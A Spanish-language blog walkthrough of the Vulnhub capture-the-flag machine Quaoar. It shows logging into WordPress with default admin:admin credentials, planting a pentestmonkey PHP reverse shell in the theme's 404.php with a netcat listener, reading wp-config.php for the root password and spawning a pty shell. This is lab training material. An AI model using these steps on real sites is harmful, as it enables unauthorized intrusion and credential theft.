(https://cdn-images-1.medium.com/max/2000/1*PzbHsNXqfibB7WNcyj6Zmw.jpeg)
En este tutorial vamos a resolver la maquina virtual hackfest2016: Quaoar la cual la pueden descargar desde vulnhub (https://www.vulnhub.com/entry/hackfest2016-quaoar,180/).
Viendo la descripción de la maquina virtual pide que encontremos 3 flags.
There are 3 flags on this machine
1. Get a shell
2. Get root access
3. There is a post exploitation flag on the boxLaboratorio:
Atacante Kali: 192.168.1.100
Victima Quaoar: 192.168.1.101Escaneo:
(https://3.bp.blogspot.com/-ILACoFbYSOc/WW9lrqShsTI/AAAAAAAAD1Q/blM06NFz3Hc03s-xfWFzZdVMxt2b-hINACLcBGAs/s1600/quoar1.png)
Como vemos tenemos un apache corriendo en el 80.
(https://1.bp.blogspot.com/-u72EcKsCjYs/WW9mZNFbtlI/AAAAAAAAD1U/Q00ZFZ0HhEwZOCj4Mlr5hwlnWS76IDwCgCLcBGAs/s1600/quoar2.png)
Buscando directorios con nmap
(https://3.bp.blogspot.com/-Cp7HQEZVByk/WW9nNkK11MI/AAAAAAAAD1Y/O8RHz4oScLw-CTrXqa9CquXR5agP-GAewCLcBGAs/s1600/quoar3.png)
Genial tenemos un wordpress. Ahora le pasare un scanner conocido como cmsmap (https://github.com/Dionach/CMSmap)
(https://1.bp.blogspot.com/-vuTKn-INYts/WW9nN5MmxEI/AAAAAAAAD1c/AYx1i5Hr53YKFANVFCnfb75nzHBdzJBcwCLcBGAs/s1600/quoar4.png)
Al poco tiempo del scaneo nos mostrará que el sitio esta utilizando contraseñas por defecto que serian admin:admin así que vamos a omitir cualquier explotación de vulnerabilidades web y obtendremos acceso al equipo mediante una reverse shell en php.
Ingresando al administrador del bloguser: admin
password:adminUna vez echo esto, nos vamos al appearance --> editor --> 404.php, la página 404 es la que tendra la reverse shell que voy a utilizar que será una de pentestmonkey (http://pentestmonkey.net/tools/web-shells/php-reverse-shell).
(https://1.bp.blogspot.com/-lNy0TyrTH1s/WW9oXKQGh9I/AAAAAAAAD1g/mtt7fTa1T8wEMETdBJJs9hbUw2v2p9COgCLcBGAs/s1600/quoar.png)
Procedemos a modificar la reverse shell.
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THISIP Atacante: 192.168.1.100
Por: lo dejare por defecto.
Ahora pondremos a la escucha nuestro netcat
nc -v -n -l -p 1234Al ingresar a la dirección de la página 404 obtendremos acceso al sistema, la url seria http://192.168.1.101/wordpress/wp-content/themes/twentyfourteen/404.php. twentyfourteen es el theme que se esta utilizando en el sitio.
(https://4.bp.blogspot.com/-avgG0FvJyso/WW9qouJP5gI/AAAAAAAAD1o/oyKf9nD8IMgc_5zFtgw9yi7Yn2pOI-xSACLcBGAs/s1600/quoar5.png)
Flag: 1. Get a shell (https://1.bp.blogspot.com/-nntTDqnGxMI/WW9rDfLAD5I/AAAAAAAAD1s/hx3SpMVTd9gqGNgD7G-9hVdXkzy1GR8UgCLcBGAs/s1600/flag1.png)
Con el comando locate voy a buscar el archivo flag.txt, al hacer eso nos dice que se encuentra en la carpeta /home/wpadmin/, después solo vere su contenido con el comando cat.
Flag 2. Get root access Como el sitio esta en wordpress se me ocurrio hacerle un cat al archivo wp-config.php muchas veces colocan por ahi la password root
(https://2.bp.blogspot.com/-WPQV9thIXAs/WW9yeHL3UUI/AAAAAAAAD2E/8SbEcWDuvKQdIcgB7Cn3QKTam9st98nWgCLcBGAs/s1600/quoar6.png)
Genial la contraseña es: rootpassword!
Ahora voy a obtener una bash con el siguiente comando.
python -c 'import pty;pty.spawn("/bin/bash")'(https://2.bp.blogspot.com/-fS6Ra4txuoA/WW9zw7YPiuI/AAAAAAAAD2I/4w36GvosC4E6wVr6uSm38q1SGUOCoyRvACLcBGAs/s1600/quoar7.png)
Yeaaa! como podemos ver, en la carpeta root se encuentra la segunda flag.
Flag 3. There is a post exploitation flag on the box.Sin duda esta fué la que me tomo más tiempo, para encontra esta flag utilice de recurso Linux Post Exploitation Command List (https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List) después de un rato leyendo el repositorio hago un cat sobre /etc/crontab
Crontab es un simple archivo de texto que guarda una lista de comandos a ejecutar en un tiempo especificado por el usuario(https://2.bp.blogspot.com/-5TrYU33YnFc/WW91PRQOoqI/AAAAAAAAD2M/VjWqI6wwwS4zFLDWc7gUFDqgT5jlcjEUACLcBGAs/s1600/quoar8.png)
Nada de flag ):, ahora me iré a ver la carperta cron.d en el directorio etc.
(https://1.bp.blogspot.com/-RNLKJ0voTTQ/WW91wUU-ErI/AAAAAAAAD2Q/9WtRb8Q9aHwN-wnOUvPaiZ1j68FBtMfkgCLcBGAs/s1600/quoar9.png)
Fuck yea! Al hacerle un cat al archivo php5 que se encontraba en la carpeta nos arroja información y un texto md5 cual es la ultima flag.